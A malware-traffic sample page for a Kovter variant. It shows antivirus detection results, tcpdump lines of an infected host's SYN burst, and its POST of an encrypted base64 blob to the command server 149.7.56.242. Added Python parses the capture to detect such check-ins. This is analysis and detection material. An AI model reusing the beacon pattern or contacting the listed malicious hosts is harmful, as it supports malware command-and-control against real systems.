Malware / Crimeware: Kovter variant (also flagged as Sality) PCAP traffic sample, POST to 149.7.56.242

Download attachment

  • pcap (78 KB)
    Date added: May 15, 2017 2:32 am Added by: admin

SHA256:     2c19e2d256bb104c7cfdc2e832db3ef2b52aa3fb7fb413fafff443767d64ba21
File name:     caa2db.png
Detection ratio:     21 / 61
Analysis date:     2017-05-14 22:41:25 UTC

Engine     Result     Signature date
AegisLab     Ml.Attribute.Gen!c     20170514
AVware     Trojan.Win32.Kovter.ab (v)     20170514
Baidu     Win32.Trojan.WisdomEyes.16070401.9500.9999     20170503
Bkav     W32.eHeur.Virus02     20170513
CrowdStrike Falcon (ML)     malicious_confidence_95% (W)     20170130
Cyren     W32/Kovter.T2.gen!Eldorado     20170514
Endgame     malicious (high confidence)     20170503
F-Prot     W32/Kovter.T2.gen!Eldorado     20170514
Fortinet     W32/GenKryptik.AFPN!tr     20170514
Invincea     virus.win32.sality.at     20170413
Kaspersky     UDS:DangerousObject.Multi.Generic     20170514
McAfee     Artemis!D5CBA842097F     20170514
McAfee-GW-Edition     BehavesLike.Win32.BadFile.gc     20170514
Palo Alto Networks (Known Signatures)     generic.ml     20170514
Rising     Malware.Undefined!8.C (cloud:VCzxuyZpW1S)     20170514
Sophos     Mal/Kovter-Z     20170514

Sixteen of the 21 detecting engines are listed. Four of them (AVware, Cyren, F-Prot, Sophos) name the sample Kovter; the Sality label in the title comes from Invincea alone, and the rest are generic or machine-learning verdicts. The file was submitted as caa2db.png, but every engine that names a platform says Win32, so the extension does not describe the content.

2017-05-14 20:53:50.917403 IP 192.168.1.102.57629 > 77.222.57.40.80: Flags [P.], seq 0:397, ack 1, win 256, length 397: HTTP: GET /counter/?2 HTTP/1.1
GET /counter/?2 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: teplo-svet.ru
Connection: Keep-Alive

2017-05-14 20:54:32.044891 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:34.979543 IP 192.168.1.102.57636 > 89.128.122.206.80: Flags [S], seq 3814211414, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:34.984644 IP 192.168.1.102.57637 > 4.147.159.25.443: Flags [S], seq 412506540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:34.984990 IP 192.168.1.102.57638 > 30.57.229.139.443: Flags [S], seq 1803044719, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:35.047201 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:35.971540 IP 192.168.1.102.57639 > 110.149.5.72.80: Flags [S], seq 815124318, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.000855 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.001006 IP 192.168.1.102.57641 > 113.37.247.181.443: Flags [S], seq 1968376134, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.001354 IP 192.168.1.102.57642 > 139.64.76.229.80: Flags [S], seq 2625793854, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.538576 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.979641 IP 192.168.1.102.57636 > 89.128.122.206.80: Flags [S], seq 3814211414, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.984593 IP 192.168.1.102.57638 > 30.57.229.139.443: Flags [S], seq 1803044719, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.986107 IP 192.168.1.102.57637 > 4.147.159.25.443: Flags [S], seq 412506540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.998697 IP 192.168.1.102.57644 > 138.93.43.78.80: Flags [S], seq 4062964059, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:38.076664 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-05-14 20:54:38.971798 IP 192.168.1.102.57639 > 110.149.5.72.80: Flags [S], seq 815124318, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:39.029411 IP 192.168.1.102.57645 > 219.160.233.9.80: Flags [S], seq 1109265395, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:39.029560 IP 192.168.1.102.57646 > 143.152.93.69.443: Flags [S], seq 52045857, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:39.029881 IP 192.168.1.102.57647 > 186.34.203.232.80: Flags [S], seq 1401377303, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:40.000997 IP 192.168.1.102.57641 > 113.37.247.181.443: Flags [S], seq 1968376134, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
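The block above is a burst of SYNs from 192.168.1.102 to a dozen unrelated addresses on ports 80 and 443, and several of them are sent again with the same sequence number (port 57634 to 185.117.72.90 at 20:54:32 and again at 20:54:35; port 57640 to 40.132.137.109 three times), which is what a client does when no SYN/ACK comes back. The Python below is an added example, not code from this page, that parses tcpdump summary lines of this form and reports, per source host, how many distinct targets were tried, how many SYNs were retransmissions, how many flows never saw a SYN/ACK, the time span, and which SYN fingerprints (window plus TCP options) the host used. SAMPLE is a constructed subset of this capture's lines, including the two SYNs further down that use win 65535 without wscale; the thresholds in is_syn_burst are assumed.

```python
"""Flag an outbound burst of unanswered SYNs in tcpdump one-line summaries
(the `tcpdump -nn -tttt` style shown on this page). Added example for this
page, not code from the original; SAMPLE is a constructed subset of the
capture's lines, and the thresholds in is_syn_burst are assumed."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed subset of the capture: seven SYNs from the burst above (two of
# the flows retransmitted), the later POST (a non-SYN packet the parser ignores)
# and two SYNs further down the capture with a different window/option set.
SAMPLE = """\
2017-05-14 20:54:32.044891 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:34.979543 IP 192.168.1.102.57636 > 89.128.122.206.80: Flags [S], seq 3814211414, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:34.984644 IP 192.168.1.102.57637 > 4.147.159.25.443: Flags [S], seq 412506540, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:35.047201 IP 192.168.1.102.57634 > 185.117.72.90.80: Flags [S], seq 3960348986, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.000855 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:37.538576 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:54:38.076664 IP 192.168.1.102.57640 > 40.132.137.109.443: Flags [S], seq 3552221214, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-05-14 20:55:15.763210 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [P.], seq 0:782, ack 1, win 260, length 782: HTTP: POST / HTTP/1.1
2017-05-14 20:55:16.297627 IP 192.168.1.102.57691 > 61.4.189.82.80: Flags [S], seq 3027012828, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2017-05-14 20:55:16.298106 IP 192.168.1.102.57690 > 76.17.68.147.443: Flags [S], seq 4234031649, win 65535, options [mss 1460,nop,nop,sackOK], length 0
"""

PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > (?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\], seq (?P<seq>\d+)(?::\d+)?(?:, ack \d+)?, win (?P<win>\d+)"
    r"(?:, options \[(?P<opts>[^\]]*)\])?"
)


def parse(text):
    """Yield a regex match per line that is in tcpdump summary format."""
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            yield m


def syn_stats(text):
    """Per source host: distinct targets, SYN count, retransmissions, flows
    that never saw a SYN/ACK, time span, and the SYN fingerprints used."""
    syns = defaultdict(list)     # (src, sport, dst, dport) -> [ISN, ...]
    answered = set()             # client 4-tuples for which a SYN/ACK was seen
    times = defaultdict(list)
    fps = defaultdict(set)
    for m in parse(text):
        if m["flags"] == "S":
            key = (m["src"], m["sport"], m["dst"], m["dport"])
            syns[key].append(m["seq"])
            times[m["src"]].append(datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"))
            fps[m["src"]].add(f"win={m['win']} opts=[{m['opts'] or ''}]")
        elif m["flags"] == "S.":
            # SYN/ACK from the server: record the client side of that flow.
            answered.add((m["dst"], m["dport"], m["src"], m["sport"]))
    stats = {}
    for key, isns in syns.items():
        src = key[0]
        s = stats.setdefault(src, {"targets": set(), "syns": 0,
                                   "retransmits": 0, "unanswered": 0})
        s["targets"].add(key[2:])
        s["syns"] += len(isns)
        # The same 4-tuple carrying the same ISN again is a retransmission, so
        # no SYN/ACK arrived; a new connection reusing the port gets a new ISN.
        s["retransmits"] += len(isns) - len(set(isns))
        if key not in answered:
            s["unanswered"] += 1
    for src, s in stats.items():
        s["targets"] = len(s["targets"])
        s["window_s"] = (max(times[src]) - min(times[src])).total_seconds()
        s["fingerprints"] = sorted(fps[src])
    return stats


def is_syn_burst(s, min_unanswered=5, max_window_s=60.0):
    """Rule: several distinct unanswered outbound SYNs from one host inside a
    short window. Both thresholds are assumed values for this example."""
    return s["unanswered"] >= min_unanswered and s["window_s"] <= max_window_s


if __name__ == "__main__":
    for src, s in syn_stats(SAMPLE).items():
        verdict = "SYN burst" if is_syn_burst(s) else "ok"
        print(f"{src}: {verdict}; {s['targets']} targets, {s['syns']} SYNs, "
              f"{s['retransmits']} retransmits, {s['unanswered']} unanswered "
              f"in {s['window_s']:.1f}s")
        for fp in s["fingerprints"]:
            print("   ", fp)
```

A changed fingerprint from one host is a lead, not a verdict: the capture itself shows the wscale option disappear on the third SYN to 40.132.137.109, so an option set can change during plain retransmission. The later SYNs from ports 57690 and 57691 differ in both window (65535 instead of 8192) and options, which is worth a closer look at what produced them.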

2017-05-14 20:55:15.763210 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [P.], seq 0:782, ack 1, win 260, length 782: HTTP: POST / HTTP/1.1
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: 149.7.56.242
Content-Length: 504
Cache-Control: no-cache

dDkQjJI9V8g/sWQGkVkPOFln9Cu2a1Ft3vvFv/uu28Sbaayp4itduj1MVsgyESyD4hISKWXvYOIS3oCrpA6K3lzuLIDPsf4fR6BjBTxX+hhCwv1T2IXHwUrbqtku5b98qIulFTbVxhRIrcoth8zpfXNS0UWRBC7OUpkgTqofleVEw2OfTcvVocwoWgf347MCZNMo2KYtblWZJlKPKwMSGF5AXg+IBNP84gK/n/4+GG5dTm7JWuWg2Odlru73/im8I4y3RCEnoLMMRiMODLea/+lDRwde18bLS/3k51y6BuCiqc9QlzeL1ng00Eea0AqQur+VicYLilQaaOt7j41LF8503Y8Ud095Jakv3V31c5bwDQjFsvWCEyv54ZT+2J5dAiL8Uu7mkQH4RoVZZGpA/1dxtCxmQ57mEOedfSkQsNZWh2VTix69rGhEBb3FsgAEEytZVFk6bVHVVrHDghdgBXNqEYkjTe4gX+Rbn2fv6GlUJOd/66C93gU/
2017-05-14 20:55:15.869169 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [.], ack 527, win 258, length 0
2017-05-14 20:55:15.869540 IP 192.168.1.102.57709 > 149.7.56.242.80: Flags [F.], seq 782, ack 527, win 258, length 0
2017-05-14 20:55:16.185597 IP 192.168.1.102.57707 > 183.80.248.119.8080: Flags [S], seq 2165204769, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-14 20:55:16.297627 IP 192.168.1.102.57691 > 61.4.189.82.80: Flags [S], seq 3027012828, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2017-05-14 20:55:16.298106 IP 192.168.1.102.57690 > 76.17.68.147.443: Flags [S], seq 4234031649, win 65535, options [mss 1460,nop,nop,sackOK], length 0
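The POST to 149.7.56.242 shows the marks of a Kovter-style check-in in the request alone: the Host header is a bare IP, the path is /, the Content-Type declares a form but the 504-byte body has no key=value pairs, only a string from the base64 alphabet whose length is a multiple of 4 (504 characters, exactly the Content-Length), and the User-Agent claims MSIE 7.0 while the GET to teplo-svet.ru a minute earlier claimed MSIE 8.0 from the same host. The ack 527 that follows shows the server answered with 526 bytes before the client sent its FIN. The Python below is an added example, not code from this page, that reassembles the request from the headers and body shown above, scores these heuristics, and decodes the body to report its length and byte entropy. The benign request used in the comparison, the score weights and the entropy threshold are assumptions for the example.

```python
"""Heuristics for a Kovter-style HTTP check-in: a raw base64 blob posted to
a bare-IP host under a form-urlencoded Content-Type. Added example for this
page, not code from the original; REQUEST is the POST shown in the capture,
reassembled from its headers and its 504-byte body."""
import base64
import math
import re

REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; "
    "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\n"
    "Host: 149.7.56.242\r\n"
    "Content-Length: 504\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "dDkQjJI9V8g/sWQGkVkPOFln9Cu2a1Ft3vvFv/uu28Sbaayp4itduj1MVsgyESyD4hISKWXvYOIS3oCrpA6K3lzuLIDPsf4fR6BjBTxX+hhCwv1T2IXHwUrbqtku5b98qIulFTbVxhRIrcoth8zpfXNS0UWRBC7OUpkgTqofleVEw2OfTcvVocwoWgf347MCZNMo2KYtblWZJlKPKwM"
    "SGF5AXg+IBNP84gK/n/4+GG5dTm7JWuWg2Odlru73/im8I4y3RCEnoLMMRiMODLea/+lDRwde18bLS/3k51y6BuCiqc9QlzeL1ng00Eea0AqQur+VicYLilQaaOt7j41LF8503Y8Ud095Jakv3V31c5bwDQjFsvWCEyv54ZT+2J5dAiL8Uu7mkQH4RoVZZGpA/1dxtCxmQ57mEOedfS"
    "kQsNZWh2VTix69rGhEBb3FsgAEEytZVFk6bVHVVrHDghdgBXNqEYkjTe4gX+Rbn2fv6GlUJOd/66C93gU/"
)

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")


def parse_request(raw):
    """Split raw HTTP/1.1 request text into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def shannon_entropy(data):
    """Bits per byte of a bytes object: roughly 4 to 5 for English text,
    close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n)
                for c in (data.count(b) for b in set(data)))


def check_post(raw):
    """Return a dict of heuristic findings and a simple additive score."""
    method, target, headers, body = parse_request(raw)
    f = {"is_post": method == "POST"}
    if not f["is_post"]:
        f["score"] = 0
        return f
    ctype = headers.get("content-type", "")
    f["bare_ip_host"] = bool(BARE_IP_RE.match(headers.get("host", "")))
    f["root_path"] = target == "/"
    # Declared as a form, but nothing that looks like key=value&key=value.
    f["form_type_without_pairs"] = ("x-www-form-urlencoded" in ctype
                                    and "=" not in body and "&" not in body)
    f["length_matches"] = headers.get("content-length") == str(len(body))
    f["body_is_base64"] = len(body) % 4 == 0 and bool(BASE64_RE.match(body))
    f["high_entropy"] = False
    if f["body_is_base64"]:
        decoded = base64.b64decode(body, validate=True)
        f["decoded_len"] = len(decoded)
        f["decoded_entropy"] = round(shannon_entropy(decoded), 2)
        # Assumed threshold: ciphertext sits near 8 bits/byte, ASCII text well below.
        f["high_entropy"] = f["decoded_entropy"] > 7.0
    f["score"] = sum(f[k] for k in ("bare_ip_host", "root_path",
                                   "form_type_without_pairs", "body_is_base64",
                                   "high_entropy"))
    return f


if __name__ == "__main__":
    for key, value in check_post(REQUEST).items():
        print(f"{key}: {value}")
```

Run it on reassembled request text from a flow (a TCP stream follow or a proxy log), not on individual packets; this 782-byte request happens to fit one segment, which is the easy case. None of the individual findings is conclusive on its own, which is why the block keeps them separate and only adds them up at the end.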
